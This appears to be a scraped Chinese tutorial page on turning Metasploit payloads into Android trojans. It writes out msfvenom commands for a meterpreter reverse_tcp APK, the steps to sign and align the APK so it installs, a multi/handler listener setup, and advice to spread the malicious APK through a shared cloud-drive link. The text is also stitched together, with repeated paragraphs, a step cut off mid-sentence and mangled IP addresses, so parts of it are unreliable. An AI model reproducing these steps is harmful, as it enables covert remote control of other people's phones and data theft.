如何手动将Metasploit的Payloads注入到Android应用中

如何手动将Metasploit的Payloads注入到Android应用中,第1张

打开vm启动Kali linux。接着打开终端,使用msfvenom制作android利用程序。Msfvenom是msfpayload和msfencode的组合。它是一个单一的工具。它有标准的命令行选项。 Msfvenom用来制造的有效载荷用来渗透Android模拟器。一旦打开终端提示符下输入以下命令,使用msfvenom工具来创建有效载荷APK文件。```msfvenom -p android/meterpreter/reverse_tcp LHOST=1921681128 LPORT=4444 R > /root/Desktop/pentestapk```p 设置要使用的payloadLHOST 设置用来接收反d连接的主机LPORT 设置用来接收反d连接的端口R 设置文件格式Location 要保存的文件位置这个命令执行完之后,你会看到一些错误,但不用担心。现在可以到输出目录查看生成的apk了。

在这次的实验中,我会使用kali linux和安卓模拟器演示如何使用Metasploit框架控制Android设备。

创建负载

我们需要两台虚拟机:Kali Linux和安卓模拟器。

打开vm启动Kali linux。接着打开终端,使用msfvenom制作android利用程序。

Msfvenom是msfpayload和msfencode的组合。它是一个单一的工具。它有标准的命令行选项。 Msfvenom用来制造的有效载荷用来渗透Android模拟器。

一旦打开终端提示符下输入以下命令,使用msfvenom工具来创建有效载荷APK文件。

```

msfvenom -p android/meterpreter/reverse_tcp LHOST=1921681128 LPORT=4444 R > /root/Desktop/pentestapk

```

p 设置要使用的payload

LHOST 设置用来接收反d连接的主机

LPORT 设置用来接收反d连接的端口

R 设置文件格式

Location 要保存的文件位置

这个命令执行完之后,你会看到一些错误,但不用担心。现在可以到输出目录查看生成的apk了。

我们已经成功创建了Android格式(APK)文件的有效载荷。现在一般Android的移动设备不允许安装没有适当签名证书的应用程序。 Android设备只安装带有签署文件的APK。

我们可以使用如下工具进行手动签名:

l Keytool (已安装)

l jar signer (已安装)

l zipalign (需要安装)

执行下列命令签名。首先使用密钥工具创建密钥库。

keytool -genkey -v -keystore my-release-keyKeystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000

`

然后使用JARsigner签名APK

jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-keyKeystore APPNAMEapk aliasname`

再用JARsigner验证签名

jarsigner -verify -verbose -certs APPNAMEapk

`

Kali没有预装Zipalign,需要先apt-get install zipalign。然后用zipalign来验证apk。

zipalign -v 4 APPNAMEapk NEWAPPNAMEapk

现在我们有了一个带有签名的APK,它可以安装在任何设备上。

使用Metasploit进行测试

接下来启动metasploit的监听器。执行msfconsole打开控制台。

use exploit/multi/handler

Set PAYLOAD android/meterpreter/reverse_tcp

SET LHOST 192168152128

SET LPORT 4444

Exploit

是时候将恶意的APK发送到手机上。我们这里使用一个网盘上传我们的APK,并将下载链接分享出去。

1、从>

目标:一台安卓手机

既然是入侵安卓手机,肯定要先配置一个安卓木马,那我们看看本机的IP

本机IP:19216816

在到终端输入命令:msfvenom -p android/meterpreter/reverse_tcp LHOST=19216817 LPORT=5555 R > /root/apkapk

以前的MSF老版本是用msfpayload生成木马 现在在新版本中都用msfvenom代替了,所以有些朋友在终端输入msfpayload的时候 会提示

msfpayload无法找到命令 所以使用msfvenom即可,这里LHOST 对应的是本机的IP地址 LPORT对应你要监听的端口 然后生成木马的路径

这样我们就在/root/路径下生成了一个APK的安卓木马文件,至于木马的免杀暂且不谈。现在我们在来启动MSF工具

以上就是关于如何手动将Metasploit的Payloads注入到Android应用中全部的内容,包括:如何手动将Metasploit的Payloads注入到Android应用中、如何使用metasploit对安卓手机进行控制、别人是怎么控制你的手机黑屏等相关内容解答,如果想了解更多相关内容,可以关注我们,你们的支持是我们更新的动力!

欢迎分享,转载请注明来源:内存溢出

原文地址: http://outofmemory.cn/zz/10108981.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2023-05-05
下一篇 2023-05-05

发表评论

登录后才能评论

评论列表(0条)

保存